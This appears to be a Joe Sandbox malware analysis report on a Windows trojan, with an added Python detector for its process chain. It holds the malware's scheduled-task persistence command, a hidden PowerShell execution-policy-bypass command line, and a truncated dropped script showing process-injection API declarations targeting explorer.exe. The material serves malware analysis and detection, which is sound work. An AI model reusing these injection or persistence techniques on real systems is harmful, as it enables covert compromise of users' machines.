                      312
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution
                      111
                      Scripting
                      1
                      Scheduled Task/Job
                      1
                      Disable or Modify Tools
                      LSASS Memory111
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts3
                      PowerShell
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      31
                      Virtualization/Sandbox Evasion
                      Security Account Manager2
                      Process Discovery
                      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                      Process Injection
                      NTDS31
                      Virtualization/Sandbox Evasion
                      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets1
                      Application Window Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                      File and Directory Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Behavior graph (ID 1543709, start date 28/10/2024, architecture WINDOWS, score 100), rendered as text from the graph data:

SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe (started)
    dropped: C:\Users\user\AppData\Local\...\winApps.dll (PE32+)
    dropped: C:\Users\user\AppData\Local\...\app.vbs (ASCII)
    dropped: C:\Users\user\AppData\Local\...\app.ps1 (ASCII)
    started: WerFault.exe
wscript.exe, two instances (both hang off the start node; the graph shows no parent process for them)
    signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy; 2 other signatures
    started: powershell.exe (one per wscript instance)
powershell.exe (first instance)
    dropped: C:\Users\user\AppData\...\iczy5vwk.cmdline (Unicode)
    signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Creates a thread in another existing process (thread injection)
    started: csc.exe, conhost.exe
    injected: explorer.exe
    csc.exe dropped C:\Users\user\AppData\Local\...\iczy5vwk.dll (PE32) and started cvtres.exe
powershell.exe (second instance)
    started: csc.exe, conhost.exe
    csc.exe dropped C:\Users\user\AppData\Local\...\spoxiyrj.dll (PE32) and started cvtres.exe
Sample-level signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 5 other signatures

Antivirus results

Submitted sample:
Source | Detection | Scanner | Label
SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | 47% | ReversingLabs | Win64.Trojan.Generic
SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | 100% | Avira | TR/Agent.ktefj

Dropped files:
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dll | 100% | Avira | TR/Agent.btqep
C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dll | 50% | ReversingLabs | Win64.Trojan.Generic

Two further scan tables: No Antivirus matches
URLs (strings as found in memory; several are truncated or carry trailing bytes from adjacent data):
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
https://powerpoint.office.comcember | 0% | URL Reputation | safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe
https://api.msn.com/ | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
https://excel.office.com | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://crl.v | 0% | URL Reputation | safe
https://outlook.com | 0% | URL Reputation | safe
                      No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://word.office.comon | explorer.exe, 0000000B.00000003.3094867488.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 0000000B.00000002.3348603804.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2174037688.000000000C84A000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://android.notify.windows.com/iOS | explorer.exe, 0000000B.00000002.3340185941.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3096799118.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2164458233.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://powerpoint.office.comcember | explorer.exe, 0000000B.00000000.2172780647.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3347671584.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 0000000B.00000002.3347671584.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2172780647.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3097166217.000000000C50F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.msn.com/ | explorer.exe, 0000000B.00000002.3343227530.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000007.00000002.2215473665.00000224425D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2278545178.00000289B2D81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://excel.office.com | explorer.exe, 0000000B.00000002.3343227530.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3096126515.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.micro | explorer.exe, 0000000B.00000002.3342474337.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2165194690.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2165708418.0000000008870000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.2215473665.00000224425D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2278545178.00000289B2D81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.v | explorer.exe, 0000000B.00000002.3335335583.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2162912358.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://outlook.com | explorer.exe, 0000000B.00000003.3094867488.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009D42000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://wns.windows.com/)s | explorer.exe, 0000000B.00000003.3094867488.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
                                No contacted IP infos
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1543709
                                Start date and time:2024-10-28 09:44:10 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 7m 14s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:18
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                Detection:MAL
                                Classification:mal100.expl.evad.mine.winEXE@18/26@0/0
                                EGA Information:Failed
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Execution Graph export aborted for target SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe, PID 3500 because there are no executed functions
• Execution Graph export aborted for target explorer.exe, PID 1028 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                • Report size getting too big, too many NtEnumerateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
Time | Type | Description
04:45:09 | API Interceptor | 67x Sleep call for process: powershell.exe modified
04:45:22 | API Interceptor | 615x Sleep call for process: explorer.exe modified
04:45:29 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
09:45:06 | Task Scheduler | Run new task: Windows App Service path: wscript.exe s>"C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
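The behavior graph and the Task Scheduler entry above describe one chain: a scheduled task named "Windows App Service" runs wscript.exe on app.vbs, which launches powershell.exe with -WindowStyle Hidden -ExecutionPolicy Bypass on app.ps1, whose Add-Type declarations make csc.exe compile a temporary DLL from a .cmdline under the user's profile before the script injects into explorer.exe. The Python below is an added example, not part of the Joe Sandbox report, that approximates the conditions behind the report's "Wscript starts Powershell", "Bypasses PowerShell execution policy" and "Dot net compiler compiles file from suspicious location" signatures, plus the scheduled-task persistence, over a few constructed process-creation and task records. The record layout (pid, ppid, image, cmdline, task name, task action), every PID except explorer.exe's 1028, and the exact csc.exe and cvtres.exe arguments are assumptions; the paths and the PowerShell command line are taken from the report.

```python
"""Added example (not from the Joe Sandbox report): approximate the report's
process-chain and persistence signatures over constructed telemetry."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


@dataclass
class TaskEvent:
    task_name: str
    action: str     # what the task launches, as the scheduler logs it


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Scripts and compiler inputs living here are user-writable, not installed software.
USER_WRITABLE = re.compile(r"\\appdata\\local\\", re.I)
EXEC_BYPASS = re.compile(r"-e(?:p|x\w*)\s+bypass", re.I)   # -ExecutionPolicy / -ep / -exec Bypass
HIDDEN_WINDOW = re.compile(r"-w\w*\s+hidden", re.I)        # -WindowStyle / -w Hidden


def _base(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def detect_process_chain(events: list[ProcEvent]) -> list[str]:
    """Flag the parent/child pairs the report records, in event order."""
    by_pid = {e.pid: e for e in events}
    findings: list[str] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue                      # parent not in this batch; nothing to correlate
        child, par = _base(e.image), _base(parent.image)

        # "Wscript starts Powershell" + "Bypasses PowerShell execution policy"
        if par in SCRIPT_HOSTS and child == "powershell.exe":
            flags = []
            if EXEC_BYPASS.search(e.cmdline):
                flags.append("ExecutionPolicy Bypass")
            if HIDDEN_WINDOW.search(e.cmdline):
                flags.append("WindowStyle Hidden")
            detail = f" ({', '.join(flags)})" if flags else ""
            findings.append(f"pid {e.pid}: {par} (pid {parent.pid}) started powershell.exe{detail}")

        # "Dot net compiler compiles file from suspicious location": Add-Type hands
        # csc.exe a .cmdline response file under the user's AppData\Local\Temp.
        if par == "powershell.exe" and child == "csc.exe":
            if USER_WRITABLE.search(e.cmdline) and ".cmdline" in e.cmdline.lower():
                findings.append(f"pid {e.pid}: csc.exe compiling a .cmdline from a "
                                f"user-writable path for powershell.exe (pid {parent.pid})")
    return findings


def detect_task_persistence(tasks: list[TaskEvent]) -> list[str]:
    """Flag scheduled tasks whose action is a script host running a .vbs from AppData."""
    findings: list[str] = []
    for t in tasks:
        action = t.action.lower()
        if (any(host in action for host in SCRIPT_HOSTS)
                and ".vbs" in action and USER_WRITABLE.search(action)):
            findings.append(f"task '{t.task_name}': script host launches a .vbs "
                            f"from a user-writable directory")
    return findings


# Constructed records mirroring the report. Only explorer.exe's PID (1028) is from
# the report; the other PIDs and the csc.exe/cvtres.exe arguments are assumed.
SAMPLE_EVENTS = [
    ProcEvent(1028, 900, r"C:\Windows\explorer.exe", r"explorer.exe"),
    ProcEvent(5100, 1028, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" '
              r'"C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"'),
    ProcEvent(5200, 5100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File '
              r'"C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"'),
    ProcEvent(5300, 5200, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk\iczy5vwk.cmdline"'),
    ProcEvent(5400, 5300, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
              r'cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC35E.tmp"'),
    # Benign control: a console opened from explorer.exe with no policy bypass.
    ProcEvent(6000, 1028, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe"),
]
SAMPLE_TASKS = [
    TaskEvent("Windows App Service",
              r'wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" '
              r'"C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"'),
    # Benign control (constructed): an installed product's updater under Program Files.
    TaskEvent("Vendor Update Check", r'"C:\Program Files\Vendor\update.exe" /check'),
]

if __name__ == "__main__":
    for line in detect_process_chain(SAMPLE_EVENTS) + detect_task_persistence(SAMPLE_TASKS):
        print(line)
```

The parent/child correlation only fires when both ends of the pair are in the same batch, which is why explorer.exe is included as a record: without it the benign powershell.exe started from the desktop would be skipped rather than evaluated and cleared. On a real host the same three conditions are what to look for in Sysmon Event ID 1 (ParentImage/Image/CommandLine) and in the Task Scheduler operational log or the output of schtasks /query /v /fo LIST.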
                                No context
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8484576755474721
                                Encrypted:false
                                SSDEEP:96:g5sFKMon1T9+I7swnN0Z7hfpQXIDcQBpc6BtScElcw3O/p+HbHg/EFA1HeaVDPOt:HXo77V0PpNtSfrj1KzuiFqZ24lO8B
                                MD5:F313326154D5DCD7A75C902331F5E039
                                SHA1:241EAF30D274B36F5715F28DD99B758EFB27F073
                                SHA-256:2E1DD9406A61B20375E25BCD6B72EFE00FB591352741D87E54A7C3F44A0B5C0D
                                SHA-512:93783FC9B5909092BDF0E1A19F997DC368019829A56172E145692F4F6F282530FB87CEC4A8F8D05EEBF9D9209624D6409C55D2A464497EF6F9E976DDD1C1FE9B
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.5.7.8.7.0.5.8.1.0.9.8.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.5.7.8.7.0.6.5.7.6.5.9.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.5.c.6.4.1.6.-.1.c.3.f.-.4.b.f.6.-.9.d.b.7.-.1.6.1.d.7.d.d.6.8.d.3.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.6.8.b.9.2.8.-.4.c.8.8.-.4.b.0.9.-.b.4.7.e.-.f.a.b.5.a.a.9.1.0.b.c.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.6.4...M.a.l.w.a.r.e.X.-.g.e.n...9.6.2.5...1.4.4.4.3...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.E.X.P.R.E.S.S...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.a.c.-.0.0.0.1.-.0.0.1.4.-.e.2.8.4.-.a.8.a.e.1.5.2.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.6.4.2.7.8.5.2.2.6.1.f.e.0.d.f.b.6.e.9.d.e.7.f.3.d.f.5.7.e.a.9.0.0.0.0.0.9.0.4.!.0.0.0.0.7.7.6.5.9.f.c.e.3.6.b.9.6.a.2.
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Mon Oct 28 08:45:06 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):63076
                                Entropy (8bit):1.7904871872581332
                                Encrypted:false
                                SSDEEP:192:m2znOsC+fHfdmCEdxhHcPS3M7ffJImys4Sm5/io7:NSv0cCIci7vs4S0l7
                                MD5:139AA7605E7D1C6DF5EA01A42EAA2443
                                SHA1:DA0796B2A5F6C289795D194A5D455066F152FCCD
                                SHA-256:53C76F52BEA2B18627A1BB79BD651DA5C66609A91DFFF7213C54A27F09FDEC2B
                                SHA-512:9B4818E5992285BD6FE0F6CB423ED9E5D86668941291A59971A0FAC027688B4ADF8AF0B02DEC41A3E6CEE07CBEE952A6000577FDE1819D4F85414CD43E2B9E6E
                                Malicious:false
                                Preview:MDMP..a..... ........O.g........................@...........<................-..........`.......8...........T...........................$...........................................................................................eJ..............Lw......................T............O.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8880
                                Entropy (8bit):3.7044401159888856
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJAIi7L6YEIeym/nGgmfvpZtNWqpr+89biX8fn2m:R6lXJXGL6YEBymegmfvpZt7isf/
                                MD5:83ACDB0382C0CBB8CB5B72B8A9405FE5
                                SHA1:008243AA29781B2BDCF8AF948F557023DD04EECE
                                SHA-256:62451FFCC48E4D727FAA932AFD69671B6C0CF01DDE3582BEFBC521939ED09AB7
                                SHA-512:626756AE18BD2F0AFE3AA2D496EA6681F663F5D2502BBF4CB74AB0AD922A8DB780A8ACE96E996083A04DED6A3937993B2DBAD52C2A7AD1A79AFB0300F1017262
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.0.0.<./.P.i.
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4884
                                Entropy (8bit):4.540620918849176
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsJJg771I9Z+VWpW8VYzYm8M4J5OotsFd+Dyq85dOTVkbbOE8O5d:uIjfbI7G+k7VTJwozkbyEX5d
                                MD5:FC369253B1C38823CA7F0A509F9D8FCF
                                SHA1:C0F91D71A00CF26B312437C94EECBCE61091D26F
                                SHA-256:D99618C52DD62E6F63AE8735A75A9C36323FE7A645A3B79A9BF0F0A6C3A54851
                                SHA-512:3572FC354F68E2C83B7A7355216258A1AF9B0A66D53668611541C285859C7C7A4E0322E1EAE285017CCAA6E910625062A2A405DB3D1F3E70AABB09010AACF4BD
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="563027" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7280976
                                Entropy (8bit):7.9999741461347025
                                Encrypted:true
                                SSDEEP:196608:zWEqkZFbTzTCqOTwlzhhR9OZxMER+jzLK:zWEnZFbeq0wlVj9OZFUfK
                                MD5:3808C579E366593A671F4A2F629AB2F1
                                SHA1:FB792FAA82FBD916AC23DA540AD1067DE670D038
                                SHA-256:4BC43C5DF2CA57FA50A683A062204D06F45D6DB15009B92A65BA63ED92E5A730
                                SHA-512:3620FF85DB249E23082324175A319CD1A3C44323B6B83E452D61B431AC31ADBE2CF9A05EA66BC8E8814C4639B0AC6EE6518FAEAA1AF7712C6E417B17492F7AEA
                                Malicious:false
                                Preview:Cz.2......._[m.4:.>C..5.\-.d.....ZE}.....!......:.z.s..*As$.......z$....)..w.8(.M.s.eDbY;..i...C........Vb..S..gx...1....\.Q..C...._a.....x...d..co..Z.G.7..-:f.X.'b.y..H.Bm\. ........$.9.~!.2..U.#.Y.!Hr+....B&c......d.u...zZQP..b6[.@....m....k\...^.......m....t.K..R...A.l.J....w..<.j...x.........K...r.T..n.PH..x....W.AcQ.......i....9.4D0.0....W-.....X...._....1.E.W...W.. }..z...v..Y...h.'.._$..L.F.#..X.Oo.........10.o6)...QJ*.n.L....E..+.:.......K%..|..bL..#H....W.^..._). .......2....5..../....;..v:...4..........]X.*#.x...A....=.(.<.v...R>..i.P..jC.=..IP..~...c..k.gy....4.F...,...G^..?....|\.!cTii^/.....A......1...;.v8v.C#....@B..[@(.........c_...j}#.42..8.J........f..6..f......CH..a.%.....c..%...<.5.P.Lk.|v....;K.'3...X2......}.`..u.n.Q......Tyw2..<.s.:A...b.Y... ..n..^..%.. .o.^ik&<I>`.....l.I_......l>.@B.).b@R...~&:.....Fp;".J.V.A8..71...<....{'yT!.{|s.{.[..h.`..........u..h..c...W..I....:5.#....I...k...o..$.H;...2v|.....@..
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4474
                                Entropy (8bit):5.040646731039938
                                Encrypted:false
                                SSDEEP:48:DtoCtK4uI5MTz7sUMfitmbouw9goxkbPzsU+GhJWpBEyl2zxUj9LceYvipcEou36:DtoOGSJ6UzsUlAb8tU1lfG3AcxsM
                                MD5:B899FE2143C074DCCC0EA0B837D6AC4A
                                SHA1:AE24D88A8EDD130C4AA095950CE48055A701BA40
                                SHA-256:BE1DAEBF8F0F0CE4CFBC2CBE13A087034741874F377F70E637D66017586CF338
                                SHA-512:3D2F56ACAC93DC5163A135FD9021F7D7B5A3AE3B566CB9C356CD4FAF95DEAD74933AA769AAF8065A170770CA3952AAF12CD4E3731775F53613C1F022FBCE04DD
                                Malicious:true
                                Preview:Add-Type @"..using System;..using System.Runtime.InteropServices;....public class WinAPI..{.. [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr OpenProcess(int processAccess, bool bInheritHandle, uint processId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, ref IntPtr lpThreadId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool Clos
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):161
                                Entropy (8bit):4.928418334390396
                                Encrypted:false
                                SSDEEP:3:j+qAHmFEm8nhcDQBgSSJJLNy1oM3KbQqPJH0cVERSHZF3BsO+HHHHJvn:j+q9Nqhnsny1R3KbQO0cBB3+nh
                                MD5:4829A6EEA56ADF04A96476ECB75EF540
                                SHA1:189444FB7CC99A1322841D84CD42656F00552D7C
